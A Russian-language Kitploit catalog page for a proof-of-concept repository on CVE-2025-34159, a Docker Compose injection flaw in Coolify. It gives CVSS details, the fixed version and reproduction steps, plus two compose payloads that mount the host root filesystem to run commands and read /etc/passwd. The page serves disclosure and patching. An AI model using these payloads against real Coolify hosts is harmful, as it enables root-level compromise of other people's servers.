Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-34159 — A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on | Kitploit
Инструменты/GitHubGitHub/eyodav/cve-2025-34159
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityMisconfigurationRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on

GitHub
eyodav/cve-2025-34159

CVE-2025-34159

Репозиторий
11 месяцев назадЕщё не проверено
Поделиться

CVE-2025-34159: Внедрение Docker Compose в Coolify

Обзор уязвимости

ПолеЗначение
CVE IDCVE-2025-34159
ЗатрагиваетCoolify ≤ v4.0.0-beta.420.6
Исправлено вv4.0.0-beta.420.7
СерьёзностьCritical
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (OS Command Injection), CWE-20 (Improper Input Validation)

Краткое описание

Критическая уязвимость удалённого выполнения кода (RCE) существует в процессе развёртывания приложений Coolify. Эта ошибка позволяет участнику с низкими привилегиями внедрять произвольные директивы Docker Compose при создании или обновлении проекта. Определяя вредоносный сервис, который монтирует файловую систему хоста, атакующий может добиться выполнения команд на уровне root на хост-ОС, полностью обходя изоляцию контейнеров.


Влияние на безопасность

  • Произвольное выполнение команд на хост-системе с привилегиями root
  • Полная компрометация хоста, включая возможность чтения/записи системных файлов, установки персистентности и перемещения по сети (lateral movement)
  • Нарушение безопасности в мультитенантной среде, потенциально компрометирующее других пользователей и команды на том же экземпляре
  • Обход механизмов защиты, делая ограничения доступа к терминалу в UI (контроль 403) неактуальными

Технические детали

Затрагиваемые версии

  • Уязвимые версии: Coolify ≤ v4.0.0-beta.420.6
  • Исправленная версия: v4.0.0-beta.420.7

Вектор атаки

Уязвимость существует в процессе развёртывания проектов, где предоставленные пользователем конфигурации Docker Compose обрабатываются без достаточной проверки или изоляции (sandboxing).


Доказательство концепции

PoC 1: Монтирование корня хоста с выполнением команд

root@kitploit:~
version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /etc/passwd
      "

Результат: После развёртывания на хост-системе появляется /tmp/proof_rce.txt, что подтверждает RCE с привилегиями root.

PoC 2: Целевая запись в путь хоста

root@kitploit:~
version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

Шаги воспроизведения

  1. Аутентифицируйтесь как пользователь уровня участника (не администратор)
  2. Создайте или отредактируйте проект в Coolify
  3. Предоставьте вредоносную конфигурацию, используя один из указанных выше Docker Compose payloads
  4. Разверните проект
  5. Подтвердите эксплуатацию, проверив наличие артефактов на хосте (например, /tmp/proof_rce.txt) или просмотрев вывод команд в журналах развёртывания

Немедленные действия

  1. Немедленно обновитесь до Coolify v4.0.0-beta.420.7 или новее
  2. Проверьте существующие проекты на наличие потенциально вредоносных конфигураций Docker Compose

Ссылки

  • Патч/Примечания к релизу: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • Рекомендация/Репозиторий PoC: https://github.com/Eyodav/CVE-2025-34159
Скачать инструмент